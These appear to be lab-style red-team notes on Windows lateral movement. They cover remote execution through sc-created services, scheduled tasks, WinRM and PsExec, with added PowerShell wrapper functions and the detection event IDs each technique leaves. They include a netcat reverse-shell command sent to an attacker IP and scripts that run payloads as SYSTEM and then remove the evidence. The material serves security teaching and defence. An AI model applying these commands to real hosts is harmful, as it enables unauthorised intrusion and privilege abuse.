Spawning Processes Remotely

Required Privileges: Administrators

Windows services can also be leveraged to run arbitrary commands, because the Service Control Manager (SCM) launches whatever binary a service is configured with when the service is started. A service executable is technically different from a regular application: it is expected to connect back to the SCM and report its status. If we point a service at an ordinary program anyway, the SCM still launches it, the program runs (as LocalSystem unless another account is configured), and the start request then fails with error 1053 ("The service did not respond to the start or control request in a timely fashion") once the SCM gives up waiting for a status report. From the attacker's point of view that failure is cosmetic: the payload has already executed. Anything that is not a plain executable path (redirection, built-ins, chained commands) must be wrapped in cmd.exe /c.

We can create a service on a remote host with sc, a standard tool available in Windows. sc connects to the target's Service Control Manager through the SVCCTL RPC interface, normally carried over named pipes on SMB (TCP 445), so it needs SMB reachability and local administrator rights on the target. Every service created this way is recorded on the target as System event 7045 (a new service was installed), which is the usual detection point for this technique.


Running as Another User

runas allows a user to run specific tools and programs with different permissions than the user's current logon provides. With /netonly the program itself still runs locally under the current token; only network authentication (SMB, LDAP, Kerberos tickets requested for remote services) uses the supplied credentials. As a result, whoami inside the spawned shell reports the original user, while something like dir \\TARGET\C$ is authenticated as the other user. Because the password is never validated locally, /netonly also works from a machine that is not joined to, or does not trust, the target domain. runas prompts for the password interactively, so it needs an interactive session.

:: Spawn a reverse shell to the attacker's IP and PORT whose network authentication uses the other user's credentials
runas /netonly /user:DOMAIN\USERNAME "C:\netcat.exe -e cmd.exe IP PORT"

Creating Services

:: Create a remote service (keep the space after binPath= and start=; runs as SYSTEM because no obj= is given)
sc \\TARGET create SERVICE_NAME binPath= "Command/PAYLOAD To Run" start= auto
:: Start (a non-service payload makes this report "StartService FAILED 1053" after it has already run) - Stop - Delete
sc \\TARGET start "SERVICE_NAME"
sc \\TARGET stop "SERVICE_NAME"
sc \\TARGET delete "SERVICE_NAME"
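The sc sequence above, wrapped into one PowerShell function as an added example (this is not code from the original notes). It treats the 1053 start error as the expected sign that the payload launched, proves which account the payload ran as by reading a file back over the C$ share, and removes the service afterwards. TARGET, the service name THMservice and the path C:\Windows\Temp\svc.txt are placeholders chosen for this example.

```powershell
# Added example, not from the original page. Wraps the sc.exe workflow for remote
# service-based execution. Target, service name and file path are placeholders.
function Invoke-RemoteServiceExec {
    param(
        [Parameter(Mandatory)] [string] $Target,    # hostname or IP; local admin rights there are required
        [Parameter(Mandatory)] [string] $Command,   # command line exactly as it should appear in the service ImagePath
        [string] $ServiceName = 'THMservice'        # arbitrary; this is the name that shows up in System event 7045
    )

    # 1. Create the service. sc.exe requires the space after 'binPath=' and 'start='.
    #    start= demand: runs only when started explicitly (start= auto would also run at every boot).
    #    No obj= is given, so the service, and therefore the payload, runs as LocalSystem.
    sc.exe \\$Target create $ServiceName binPath= $Command start= demand | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "sc create failed on $Target (exit code $LASTEXITCODE)" }

    # 2. Start it. The payload is launched immediately, but because it never reports
    #    SERVICE_RUNNING to the Service Control Manager, sc waits about 30 s and then prints
    #    'StartService FAILED 1053'. For a non-service payload that failure means success.
    $startOutput = (sc.exe \\$Target start $ServiceName 2>&1 | Out-String)
    if ($startOutput -match 'FAILED 1053') {
        Write-Host "[+] $Target : payload launched (SCM timed out waiting for a status report, as expected)"
    } elseif ($startOutput -match 'FAILED') {
        Write-Warning "Unexpected start result on $Target : $startOutput"
    }

    # 3. Remove the definition; otherwise it stays under HKLM\SYSTEM\CurrentControlSet\Services on the target.
    sc.exe \\$Target delete $ServiceName | Out-Null
}

# Usage with placeholders. A shell command (here with output redirection) is not an executable
# path, so it is wrapped in cmd.exe /c. Writing whoami to a file lets us confirm from the
# attacking host, over the C$ share, which account the service actually ran as.
Invoke-RemoteServiceExec -Target 'TARGET' -Command 'cmd.exe /c whoami > C:\Windows\Temp\svc.txt'
Get-Content '\\TARGET\C$\Windows\Temp\svc.txt'
```

With the default service account the file contains nt authority\system, which is why this technique is attractive even when the caller is "only" a local administrator on the target. The 30 s wait on start is inherent to the trick; do not treat the 1053 error as a failure in automation.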

Creating Scheduled Tasks

:: Create (runs as SYSTEM; the remote Task Scheduler is reached over RPC, so local admin rights on TARGET are needed)
schtasks /s TARGET /RU "SYSTEM" /create /tn "TASK_NAME" /tr "Command/PAYLOAD To Run" /sc ONCE /sd 01/01/2024 /st 00:00

:: Run
schtasks /s TARGET /run /TN "TASK_NAME"

:: Query the task (tasklist only lists processes, not scheduled tasks; /query shows Last Run Time and Last Result)
schtasks /s TARGET /query /TN "TASK_NAME" /V /FO LIST

:: Delete
schtasks /s TARGET /TN "TASK_NAME" /DELETE /F
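The schtasks sequence above as a single PowerShell function, added here as an example (not from the original notes). Beyond the raw commands it shows how to authenticate to the remote Task Scheduler with /U and /P instead of the current token, how to read the task's Last Result since the payload's own output never comes back, and that /SD is parsed in the local date format (MM/DD/YYYY on en-US systems). TARGET, the task name THMtask, the credential and the file path are placeholders.

```powershell
# Added example, not from the original page. Remote execution through a scheduled task
# created, run, inspected and removed with schtasks.exe. Target, task name and credentials are placeholders.
function Invoke-RemoteTaskExec {
    param(
        [Parameter(Mandatory)] [string] $Target,
        [Parameter(Mandatory)] [string] $Command,                 # runs on $Target as SYSTEM
        [string] $TaskName = 'THMtask',
        [System.Management.Automation.PSCredential] $Credential   # local admin on $Target; omit to use the current token
    )

    # schtasks authenticates to the remote Task Scheduler with /U and /P. An empty array splats
    # to nothing, so the current logon is used when no credential is given. Note that /P puts the
    # clear-text password on the local command line, visible to anyone who can list processes.
    $auth = @()
    if ($Credential) {
        $auth = @('/U', $Credential.UserName, '/P', $Credential.GetNetworkCredential().Password)
    }

    # /SC ONCE with a date in the past means the trigger never fires by itself; the task is run by hand below.
    # /RU SYSTEM runs the action as LocalSystem and needs no password. /SD follows the local date format.
    # On the target this is logged as Security event 4698 (a scheduled task was created) when auditing is on.
    schtasks /S $Target @auth /Create /F /TN $TaskName /TR $Command /SC ONCE /SD 01/01/2024 /ST 00:00 /RU SYSTEM | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "schtasks /Create failed on $Target (exit code $LASTEXITCODE)" }

    # /Run starts the action now. Nothing the payload prints is relayed back, so wait briefly and
    # read the task's status fields instead.
    schtasks /S $Target @auth /Run /TN $TaskName | Out-Null
    Start-Sleep -Seconds 5

    # Last Result 0 means the payload process exited 0; 267009 (0x41301) means it is still running.
    schtasks /S $Target @auth /Query /TN $TaskName /V /FO LIST |
        Select-String -Pattern 'Status:|Last Run Time:|Last Result:|Run As User:'

    # Remove the task definition so nothing is left under C:\Windows\System32\Tasks on the target.
    schtasks /S $Target @auth /Delete /TN $TaskName /F | Out-Null
}

# Usage with placeholders. Because the payload's output does not come back through schtasks,
# redirect it to a file on the target and fetch that file over the C$ share afterwards.
$cred = Get-Credential -UserName 'DOMAIN\USERNAME' -Message 'Local admin on TARGET'
Invoke-RemoteTaskExec -Target 'TARGET' -Credential $cred -Command 'cmd.exe /c whoami > C:\Windows\Temp\task.txt'
Get-Content '\\TARGET\C$\Windows\Temp\task.txt'
```

Unlike the service trick there is no spurious error to wait through: /Run returns immediately and the task's Last Result is the only feedback, which is why the function queries it before deleting the task.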

Remote Process Creation Using WinRM

Required Group Memberships: Remote Management Users

Windows Remote Management (WinRM) is Microsoft's implementation of the WS-Management protocol: SOAP messages over HTTP (TCP 5985) or HTTPS (TCP 5986), used to run PowerShell and command-line tools on Windows hosts remotely. Windows Server 2012 and later has WinRM enabled by default; Windows client editions do not unless it is turned on by policy or with Enable-PSRemoting. Membership in Remote Management Users is enough to connect to the default session configuration, but the commands run with that account's own rights, so this alone does not give administrative access to the host.

:: Create an interactive cmd session on TARGET, running as USERNAME
winrs -u:USERNAME -p:PASSWORD -r:TARGET cmd
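PowerShell Remoting over the same WinRM service, added here as an example (not from the original notes) of what the protocol offers beyond the winrs one-liner: a reachability check, credential handling, a one-shot command that returns objects rather than text, a reusable session that can also carry a file to the target, and the interactive equivalent of winrs. TARGET, DOMAIN\USERNAME, the address 10.10.10.5, tool.exe and C:\Windows\Temp\tool.exe are placeholders.

```powershell
# Added example, not from the original page. PowerShell Remoting over WinRM as the richer
# alternative to winrs. Target, account, tool and paths are placeholders; the account must be
# a member of Remote Management Users (or Administrators) on the target.

# 1. Reachability check. WinRM listens on TCP 5985 (HTTP) and 5986 (HTTPS); this fails fast
#    when the listener is missing or filtered, before any credentials are sent.
Test-WSMan -ComputerName 'TARGET'

# 2. Credentials. Connecting by hostname lets Kerberos authenticate. Connecting by IP address
#    falls back to NTLM, which the client refuses over HTTP unless the address is trusted:
#    Set-Item WSMan:\localhost\Client\TrustedHosts -Value '10.10.10.5' -Concatenate
$cred = Get-Credential -UserName 'DOMAIN\USERNAME' -Message 'Remote Management Users member'

# 3. One-shot command. The script block runs on the target and the result comes back as a
#    (deserialized) object, so it can be filtered and formatted locally instead of parsing text.
#    IsAdmin tells you whether this account is merely allowed to connect or actually administers the host.
Invoke-Command -ComputerName 'TARGET' -Credential $cred -ScriptBlock {
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    [pscustomobject]@{
        Host    = $env:COMPUTERNAME
        User    = $id.Name
        IsAdmin = ([Security.Principal.WindowsPrincipal]$id).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    }
}

# 4. Persistent session: reuse it for several commands and push a tool over the same HTTP(S)
#    channel, so no SMB share is needed (unlike the sc and PsExec techniques). Copy-Item -ToSession
#    needs PowerShell 5.0 or later on both ends.
$s = New-PSSession -ComputerName 'TARGET' -Credential $cred
Copy-Item -Path .\tool.exe -Destination 'C:\Windows\Temp\tool.exe' -ToSession $s
Invoke-Command -Session $s -ScriptBlock { & 'C:\Windows\Temp\tool.exe' }

# 5. Interactive shell in the same session, the PowerShell counterpart of "winrs ... cmd".
#    Type exit to return to the local prompt; Remove-PSSession $s tears the session down.
Enter-PSSession -Session $s
```

Each connection is logged on the target as a network logon (Security event 4624, logon type 3) and, when PowerShell logging is enabled, in the Microsoft-Windows-WinRM and PowerShell operational logs; WinRM lateral movement therefore looks different from the SMB-based techniques and is worth hunting separately.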


PsExec

Required Privileges: Administrators

PsExec (Sysinternals) lets an administrator run commands remotely on any machine where the account has local administrator rights. Under the hood it copies its service binary (PSEXESVC.exe) to the ADMIN$ share over SMB, registers and starts it as a service through the Service Control Manager, and relays the remote process's input and output over named pipes. It therefore needs TCP 445 and local admin on the target, and it leaves the same kind of trail as the sc technique: a PSEXESVC service installation (System event 7045) and the binary dropped into C:\Windows.

:: Accept the EULA once, or the command will not run (it can also be combined with the command below as -accepteula)
PsExec64.exe -accepteula
:: Interactive cmd on the target as USERNAME; add -s to run as SYSTEM instead
PsExec64.exe \\TARGET_IP -u USERNAME -p PASSWORD -i cmd.exe